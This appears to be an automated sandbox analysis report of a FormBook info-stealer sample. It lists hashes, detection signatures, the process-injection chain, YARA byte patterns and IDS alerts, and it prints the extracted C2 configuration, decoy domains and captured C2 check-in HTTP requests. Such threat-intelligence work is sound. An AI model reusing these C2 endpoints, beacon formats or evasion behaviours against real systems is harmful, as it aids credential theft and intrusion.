Play interactive tour

Edit tour

Analysis Report in.exe

Overview

General Information

Sample Name:	in.exe
Analysis ID:	412024
MD5:	9904ec065111725685cbe8865bf33e6d
SHA1:	b55d215d3480c6ee9178a548f2cf3b3ba00f691d
SHA256:	a9c017e2d279ba3ef817b6db811ce21af904951e7f5a7460f1ba74c563b96cb4
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netstat to query active network connections and open ports

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

in.exe (PID: 6236 cmdline: 'C:\Users\user\Desktop\in.exe' MD5: 9904EC065111725685CBE8865BF33E6D)

in.exe (PID: 6388 cmdline: C:\Users\user\Desktop\in.exe MD5: 9904EC065111725685CBE8865BF33E6D)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

NETSTAT.EXE (PID: 6848 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

cmd.exe (PID: 5764 cmdline: /c del 'C:\Users\user\Desktop\in.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.holodov.net/sjgd/"], "decoy": ["hjtzzg.com", "arabiaprogram.com", "hana-pet.com", "jointreleif911.com", "superuglycakes.com", "f5gcpxgfs3rkf.net", "bentengproperti.com", "josiewalter.com", "nallove.com", "contorig2.com", "kruberm.com", "wcieckashmir.com", "syggao.com", "rollinproduction.com", "furiael.online", "harasalcancu.com", "cesarscott.com", "high5promotions.com", "bemagicnottragic.com", "orangeapron.net", "thegiftofyourstory.com", "mynewbuildhome.com", "practicalfitnessidea.com", "arkanlune.com", "upmcmhealthplan.com", "skyabovelog.com", "yawicanada.com", "hxmeirong.com", "vacation-all-inclusive.com", "candoubaoku.com", "xiangche360.com", "rce.cool", "nqwydhxgrw.com", "assistance-technique.info", "444999dy.com", "faktacount.com", "foggylife.com", "underneathberlin.com", "wy1687.com", "liveblanch.life", "childvictimsactinfo.com", "portalmedan.com", "tomwanamaker.net", "homeoffice-musthaves.com", "mano.one", "minahapshy.com", "vedgc.com", "thegoodcaptain.net", "uniccodocs.com", "centerdecorstore.com", "mein-business.online", "9f1.net", "pathwaytopurposetherapy.com", "nyhtgj88.com", "troels1.com", "fashionblessings.com", "donatebtc.info", "sparta-mc.online", "520age.com", "agaragar.info", "leeindustrles.com", "couttsagency.com", "telemedspain.com", "industry-automation.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xf1168:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf14f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x118388:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x118712:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfd205:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x124425:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfccf1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x123f11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfd307:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x124527:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfd47f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12469f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf1f0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11912a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xfbf6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x12318c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xf2c82:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x119ea2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1022f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x129517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10339a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xff229:$sqlite3step: 68 34 1C 7B E1 0xff33c:$sqlite3step: 68 34 1C 7B E1 0x126449:$sqlite3step: 68 34 1C 7B E1 0x12655c:$sqlite3step: 68 34 1C 7B E1 0xff258:$sqlite3text: 68 38 2A 90 C5 0xff37d:$sqlite3text: 68 38 2A 90 C5 0x126478:$sqlite3text: 68 38 2A 90 C5 0x12659d:$sqlite3text: 68 38 2A 90 C5 0xff26b:$sqlite3blob: 68 53 D8 7F 8C 0xff393:$sqlite3blob: 68 53 D8 7F 8C 0x12648b:$sqlite3blob: 68 53 D8 7F 8C 0x1265b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: in.exe PID: 6236	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.in.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.in.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.in.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
2.2.in.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.in.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.in.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.holodov.net/sjgd/"], "decoy": ["hjtzzg.com", "arabiaprogram.com", "hana-pet.com", "jointreleif911.com", "superuglycakes.com", "f5gcpxgfs3rkf.net", "bentengproperti.com", "josiewalter.com", "nallove.com", "contorig2.com", "kruberm.com", "wcieckashmir.com", "syggao.com", "rollinproduction.com", "furiael.online", "harasalcancu.com", "cesarscott.com", "high5promotions.com", "bemagicnottragic.com", "orangeapron.net", "thegiftofyourstory.com", "mynewbuildhome.com", "practicalfitnessidea.com", "arkanlune.com", "upmcmhealthplan.com", "skyabovelog.com", "yawicanada.com", "hxmeirong.com", "vacation-all-inclusive.com", "candoubaoku.com", "xiangche360.com", "rce.cool", "nqwydhxgrw.com", "assistance-technique.info", "444999dy.com", "faktacount.com", "foggylife.com", "underneathberlin.com", "wy1687.com", "liveblanch.life", "childvictimsactinfo.com", "portalmedan.com", "tomwanamaker.net", "homeoffice-musthaves.com", "mano.one", "minahapshy.com", "vedgc.com", "thegoodcaptain.net", "uniccodocs.com", "centerdecorstore.com", "mein-business.online", "9f1.net", "pathwaytopurposetherapy.com", "nyhtgj88.com", "troels1.com", "fashionblessings.com", "donatebtc.info", "sparta-mc.online", "520age.com", "agaragar.info", "leeindustrles.com", "couttsagency.com", "telemedspain.com", "industry-automation.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: in.exe	Virustotal: Detection: 30%	Perma Link
Source: in.exe	Metadefender: Detection: 35%	Perma Link
Source: in.exe	ReversingLabs: Detection: 75%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: in.exe

Joe Sandbox ML: detected

Source: 2.2.in.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: in.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: in.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netstat.pdbGCTL source: in.exe, 00000002.00000002.285944809.0000000001160000.00000040.00000001.sdmp
Source:	Binary string: netstat.pdb source: in.exe, 00000002.00000002.285944809.0000000001160000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: in.exe, 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: in.exe, NETSTAT.EXE

Source: C:\Users\user\Desktop\in.exe	Code function: 4x nop then pop ebx	2_2_00406A9D
Source: C:\Users\user\Desktop\in.exe	Code function: 4x nop then pop edi	2_2_0040C3CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi	8_2_0102C3CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop ebx	8_2_01026A9D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 78.142.63.38:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 78.142.63.38:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 78.142.63.38:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.holodov.net/sjgd/

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=e2SwNy5jTXYhIJXNsx2jjLy0bcCG+bMU9WGMv0QquE/Juv17dG/pwBG3zi56WICLhfuF&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.couttsagency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.industry-automation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=1PFHXCgs6H1RDCiwx9JNnUIhtMFE4B7sgwhyYm7kgJX0BWSMA5HZMbs3oaApumpuT18L&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.fashionblessings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.128.23.153 52.128.23.153

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: DOSARRESTUS DOSARRESTUS

Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=e2SwNy5jTXYhIJXNsx2jjLy0bcCG+bMU9WGMv0QquE/Juv17dG/pwBG3zi56WICLhfuF&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.couttsagency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.industry-automation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sjgd/?F6AD0t=1PFHXCgs6H1RDCiwx9JNnUIhtMFE4B7sgwhyYm7kgJX0BWSMA5HZMbs3oaApumpuT18L&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1Host: www.fashionblessings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.couttsagency.com

Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: in.exe, 00000000.00000002.241089375.00000000024E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
